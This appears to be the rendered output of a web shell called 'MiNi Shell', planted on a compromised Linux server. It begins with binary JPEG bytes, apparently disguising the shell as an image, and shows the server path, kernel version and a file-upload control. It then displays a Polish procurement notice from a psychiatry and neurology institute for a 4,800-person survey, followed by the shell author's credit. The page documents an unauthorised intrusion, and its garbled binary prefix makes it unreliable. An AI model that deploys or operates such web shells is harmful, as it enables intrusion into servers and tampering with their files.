JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241031/0057358601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Badanie ankietowe na liczącej N=4800 osób próbie reprezentatywnej<br/>ludności w wieku 18 lat i więcej metodą wywiadów bezpośrednich </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Psychiatrii i Neurologii</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288509</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sobieskiego 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-957</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mkowalczyk@ipin.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ipin.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Badanie ankietowe na liczącej N=4800 osób próbie reprezentatywnej<br/>ludności w wieku 18 lat i więcej metodą wywiadów bezpośrednich </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a7ab795a-68d5-44fc-9dcc-5c8a17cfc4bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00573586</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https//:ipin.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https//:ipin.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ,<br/>jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w<br/>przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) Włączona obsługa JavaScript;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>6) Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, r􀆞, pdf ,xps, odt,<br/>ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, 􀆟f, 􀆟ff, geo􀆟ff, png, svg, wav, mp3, avi, mpg,<br/>7<br/>mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie<br/>o ochronie danych, Dz.Urz.UE L I 19 z 4.05.2016r. str.1), dalej RODO, informuje że:<br/>1) Administratorem Pani/Pana danych osobowych jest Instytut Psychiatrii i Neurologii w Warszawie ul.<br/>Sobieskiego 9;<br/>2) Inspektorem ochrony danych osobowych w/nazwa zamawiającego jest Pani/Pana imię nazwisko,<br/>kontakt :adres, e-mail, telefon;<br/>1) Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego w /w postępowaniu, prowadzonym w<br/>trybie przetargu nieograniczonego;<br/>2) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust.3 ustawy z dnia 11<br/>września 2019r. – Prawo zamówień publicznych (Dz.U z 2024 r. poz. 1320);<br/>3) Dane osobowe będą przechowywane, zgodnie z art. 97 ust.1 ustawy Pzp. Przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia , a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>4) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp. Związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego, konsekwencje nie podania określonych<br/>danych wynikają z ustawy Pzp;<br/>5) W odniesieniu do Pana/Pani danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>88. Posiada Pani/Pan:<br/>1) prawo dostępu do danych osobowych Pani/Pana dotyczących, zgodnie z art. 15 RODO<br/>2) prawo do sprostowania Pani/Pana danych osobowych na podstawie art. 16 RODO<br/>3) prawo żądania od administratora ograniczenia przetwarzania danych osobowych na podstawie<br/>art. 18 RODO z zastrzeżeniem przypadków, o których mowa w art. 18 ust 2 RODO<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących naruszenia przepisów RODO<br/>89. Nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust.3 lit b ,d lub e RODO prawo do usunięcia danych osobowych,<br/>2) prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>15<br/>90. Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Instytutu Psychiatrii i Neurologii<br/>w Warszawie oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy<br/>ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego<br/>przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru<br/>Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel<br/>Pla􀆞ormy Zakupowej, na której Instytut Psychiatrii i Neurologii prowadzi postępowania o udzielenie<br/>zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP/TP/52/002/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja badania ankietowego na liczącej N=4800 osób próbie<br/>reprezentatywnej ludności w wieku 18 lat i więcej, w następujących miejscowościach/gminach<br/>(w nawiasie podano liczebność próby): Warszawa (N=1000), Katowice (N=1000), Olsztyn (N=800),<br/>Białystok (N=800), gmina wiejska Sieciechów (woj. mazowieckie) (N=600), gmina wiejska Górzno (woj.<br/>mazowieckie) (N=600), w sumie 4800 zrealizowanych ankiet.<br/>9.1 W 2024 roku badanie ankietowe będzie realizowane w Warszawie (N=1000) i Katowicach (N=1000). W<br/>2025 roku badanie ankietowe będzie realizowane w pozostałych lokalizacjach (łącznie N=2800)<br/>z uwzględnieniem przewidzianych w danej lokalizacji wielkości prób: tj. Olsztyn (N=800), Białystok<br/>(N=800), gmina wiejska Sieciechów (woj. mazowieckie) (N=600), gmina wiejska Górzno<br/>(woj. mazowieckie) (N=600).<br/>Dobór próby<br/>Wykonawca dokona doboru próby reprezentatywnej w wybranych lokalizacjach.<br/>Sposób realizacji badania<br/>1<br/>Badanie metodą CAPI (Computer Asissted Personal Interview), wywiad bezpośredni polegający<br/>na zadawaniu pytań zawartych w kwes􀆟onariuszu w wersji elektronicznej przez przeszkolonego<br/>do realizacji badania ankietera. Odpowiedzi respondentów wprowadzane bezpośrednio do przenośnego<br/>urządzenia mobilnego np. laptopa, tabletu. Przeciętny czas realizacji ankiety wynosi około 30 minut.<br/>Podstawowe zadania i obowiązki wykonawcy<br/>Wykonawca przygotuje elektroniczny skrypt ankiety na podstawie przygotowanej przez Zamawiającego<br/>ankiety papierowej. Skrypt powinien przeliczać podane przez respondentów ilości alkoholu na<br/>standardowe porcje alkoholu, uwzględniać wersję ankiety dla kobiet i dla mężczyzn, umożliwiać realizację<br/>ankiety na różnych urządzeniach mobilnych np. na laptopie, tablecie.<br/>9.2 Wykonawca przed przekazaniem elektronicznej ankiety, przeprowadzi niezbędne testy w zakresie<br/>poprawności reguł przejść, filtrów oraz wersji ankiety.<br/>9.3 Wykonawca będzie współpracował z zespołem Zamawiającego zarówno na etapie tworzenia skryptu, jak i<br/>w trakcie zbierania danych w razie konieczności wprowadzenia niewielkich zmian.<br/>9.4 Wykonawca powinien dysponować przynajmniej 20-osobową siecią ankieterów w każdej lokalizacji w<br/>następujących lokalizacjach: Warszawa, Katowice, Białystok, Olsztyn.<br/>9.5 Ankieterzy powinni mieć co najmniej 1 rok doświadczenia w pracy ankieterskiej i udział w min. 3<br/>badaniach ankietowych w populacji generalnej. Ankieterzy muszą zostać dodatkowo przeszkoleni przez<br/>Zleceniodawcę w toku 3 godzinnego szkolenia stacjonarnego.<br/>Wykonawca zapewni odpowiednią liczbę urządzeń (laptopów, tabletów) dla ankieterów.<br/>Wykonawca zapewni response rate na poziomie minimum 40%.<br/>Wykonawca na bieżąco będzie udostępniał zespołowi kontroli merytorycznej surowe dane z badania.<br/>9.6 Po wykonaniu pierwszych 10 ankiet przez każdego ankietera i uzyskaniu 200 ankiet w każdej lokalizacji,<br/>Zamawiający zarządza 3-dniową przerwę (3 dni robocze) w realizacji na sprawdzenie jakości pracy. W<br/>tym celu Wykonawca dostarczy bazę danych w SPSS do Zamawiającego.<br/>9.7 Baza danych będzie dostarczana po wykonaniu każdych kolejnych 200 ankiet aż do osiągnięcia docelowej<br/>wielkości próby.<br/>9.8 Zleceniodawca zastrzega sobie możliwość ponownego przeszkolenia lub wyłączenia z badania ankieterów,<br/>których jakość pracy będzie oceniona negatywnie.<br/>9.9 Zleceniodawca zastrzega sobie możliwość odrzucenia ankiet, których jakość oceni jako niską.<br/>9.10 Wykonawca przygotuje bazę danych w postaci zbioru SPSS, raport z badań, w tym raport z realizacji<br/>próby i tablice z rozkładami poszczególnych zmiennych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79311200-9 - Usługi przeprowadzania badań ankietowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają<br/>określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>18.1 Zdolności do występowania w obrocie gospodarczym;<br/>18.1.1 Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawcy prowadzący działalność gospodarczą<br/>lub zawodową będą wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych<br/>w państwie członkowskim unii Europejskiej, w którym posiadają siedzibę lub miejsce zamieszkania.<br/>18.2 Spełniają warunki udziału w postępowaniu dotyczące kompetencji lub uprawnień do prowadzenia<br/>określonej działalności zawodowej, o ile wynika to z odrębnych przepisów;<br/>18.1.2 Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że posiada certyfikat<br/>jakości pracy PKJPA „Gwarancja Jakości Pracy Ankieterskiej” Organizacji Firm Badania Opinii i Rynku<br/>dla badań F2F.<br/>18.3 Spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej;<br/>3<br/>18.1.3 Wykonawca posiada doświadczenie obejmujące wykonanie w okresie ostatnich 3 lat przed wszczęciem<br/>postępowania co najmniej 3 zamówień o wartości minimum 300 tys. złotych bru􀆩o każde, na badania<br/>ankietowe.<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w ostatnich 3 latach<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym<br/>okresie, wykonał co najmniej 3 usługi tożsame z przedmiotem zamówienia tzn. badań ankietowych to jest<br/>co najmniej 3 zamówień o wartości 300 000 zł bru􀆩o każde .<br/>18.1.4 Wykonawca legitymuje się wysokim wskaźnikiem realizacji próby (response rate) na próbach ludności.<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w ostatnich 3 latach przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie,<br/>wykonał co najmniej 3 badania ankietowe z zakresu nauk społecznych lub zdrowia ze wskaźnikiem realizacji<br/>próby w granicach 40%.<br/>18.1.5 Wykonawca prowadził wcześniejszą współpracę z instytucjami badawczymi w zakresie nauk<br/>społecznych i nauk o zdrowiu (co najmniej 3 projekty badawcze).<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w ostatnich 3 latach przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie,<br/>wykonał co najmniej 3 usługi podobne do przedmiotu zamówienia, tzn. badań ankietowych z instytucjami<br/>badawczymi w zakresie nauk społecznych i nauk o zdrowiu.<br/>Wykonawca dostarczy referencje/świadectwa jakości wykonanej pracy z minimum 3 badań w zakresie nauk społecznych lub nauk o zdrowiu realizowanych metodą wywiadów bezpośrednich (face to face) na próbach wpopulacji generalnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https//:ipin.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com